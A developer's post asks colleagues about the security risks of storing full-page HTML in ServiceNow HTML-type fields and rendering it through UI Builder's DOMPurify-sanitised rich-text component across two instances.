# Question about HTML Fields in ServiceNow Tables & Security Considerations
Hi team,
I'm trying to better understand the security considerations around using HTML type fields in ServiceNow tables, and I'd really value your expertise on this topic.
## General Questions:
1. What are your main concerns about using HTML fields in ServiceNow tables to store HTML content for complete pages?
2. What specific problems or vulnerabilities might arise from this approach? Are there particular reasons why we should avoid using HTML type fields in our implementation?
## My Specific Use Case:
We have two instances: MyNow and CSP. All the table APIs are in the CSP instance. When the MyNow instance calls an API, we need to send data that renders a UI Builder page.
The page render data (typically HTML) would be stored in an HTML type field. Here are my specific questions:
- Is it recommended to use HTML type fields in this cross-instance scenario?
- If we send HTML field responses and render them using the rich-text component, would this be recommended since we're using it specifically in UI Builder (which the documentation states is the intended use case)?
- The rich-text component documentation mentions it should only be used in UI Builder, which matches our use case. It also states that the component "removes `<script>` tags, inline JavaScript, and other elements that might pose security exploits" through DOMPurify sanitization. Given this, would you agree that we shouldn't face security issues in this specific implementation?
I'm eager to learn more about best practices in this area and would appreciate any knowledge you can share to help me develop a more comprehensive understanding of the security considerations.
